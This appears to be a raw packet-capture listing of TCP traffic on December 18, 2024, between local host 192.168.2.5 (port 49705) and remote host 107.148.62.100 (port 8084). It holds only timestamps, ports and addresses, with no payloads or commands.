Dec 18, 2024 13:31:59.148962021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.149024963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.163575888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.163856030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.163948059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.167227030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.167239904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.167252064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.167258978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.167327881 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.178498983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.178908110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.178970098 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.179450989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.221584082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.240200043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.240219116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.240307093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.242463112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.242480993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.242573023 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.243706942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.243722916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.243791103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.245021105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.246140957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.246202946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.247355938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.248522043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.248590946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.249749899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.249768019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.249845982 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.252578974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.252595901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.252659082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.255178928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.255196095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.255254030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.256551981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.257960081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.258035898 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.259532928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.259547949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.259619951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.262170076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.262187004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.262201071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.262254953 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.263328075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.263343096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.263358116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.263375998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.263422966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.264312983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.264331102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.264378071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.265789986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.265815020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.265858889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.266607046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.267029047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.267081976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.350502014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.350860119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.350923061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.351361036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.358839035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.358915091 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.359023094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.359529972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.359589100 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.375901937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.377012014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.377074957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.378663063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.379903078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.379919052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.379956961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.381226063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.381294012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.391664028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.392026901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.392088890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.392718077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.433715105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.456850052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.456868887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.456882954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.457025051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.458992004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.459008932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.459022045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.459060907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.459105015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.462836027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.462852955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.462867022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.462909937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.464210033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.464226961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.464241982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.464266062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.464288950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.465636015 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.465651989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.465728998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.466856003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.466871977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.466887951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.466931105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.468245983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.468312025 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.468442917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.468969107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.468983889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.469021082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.469646931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.469693899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.470185995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.471138954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.471220016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.472989082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.473005056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.473063946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.473490000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.475114107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.475173950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.475370884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.475846052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.475902081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.477255106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.477698088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.477754116 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.478183031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.480257034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.480325937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.480659008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.481652975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.481707096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.481970072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.482474089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.482531071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.564587116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.564611912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.564793110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.566349030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.575783968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.575804949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.575920105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.577095032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.577183962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.589802980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.590009928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.590111017 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.590574026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.591052055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.591108084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.591377020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.591933012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.591993093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.604249001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.604434013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.604501009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.605496883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.652765036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.667867899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.668087006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.668176889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.668688059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.669064045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.669116974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.669646978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.670114040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.670171976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.671148062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.671371937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.671431065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.671767950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.673604965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.673665047 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.673937082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.674465895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.674530029 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.678904057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.678919077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.678985119 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.680121899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.683773041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.683787107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.683798075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.683854103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.683877945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.688626051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.688640118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.688709974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.689795971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.692245960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.692315102 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.693497896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.693509102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.693581104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.697160006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.698292971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.698362112 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.699497938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.702013969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.702028990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.702069998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.703347921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.703408003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.707721949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.707736969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.707807064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.708935022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.712205887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.712261915 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.713176012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.714464903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.714529991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.716000080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.716011047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.716077089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.778279066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.778542995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.778633118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.779038906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.786930084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.787024021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.787197113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.787750959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.787811995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.803742886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.804003954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.804101944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.804464102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.804910898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.805007935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.805260897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.805773973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.805828094 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.818341017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.818718910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.818774939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.819174051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.861954927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.888355017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.888370991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.888462067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.889750004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.892232895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.892246008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.892258883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.892312050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.892400026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.896476984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.896490097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.896586895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.897628069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.900044918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.900100946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.901376963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.902496099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.902563095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.906106949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.906125069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.906183958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.907326937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.908586025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.908637047 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.909915924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.909923077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.909934044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.909981966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.911115885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.911128998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.911189079 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.912264109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.912276030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.912286997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.912327051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.912354946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.913454056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.913461924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.913467884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.913523912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.914923906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.914936066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.914947987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.914987087 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.915033102 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.916456938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.916470051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.916487932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.916528940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.918355942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.918378115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.918390989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.918430090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.918457031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.919985056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.919996977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.920053959 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.954986095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.954998016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.955056906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.992650986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.992964029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:59.993065119 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:59.993434906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.001177073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.001229048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.001355886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.001964092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.002008915 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.018378973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.018635035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.018711090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.019001007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.019474030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.019526005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.019633055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.020088911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.020149946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.035607100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.035619020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.035684109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.036983967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.082288027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.095653057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.096034050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:00.096106052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:00.096416950 CET	8084	49705	107.148.62.100	192.168.2.5
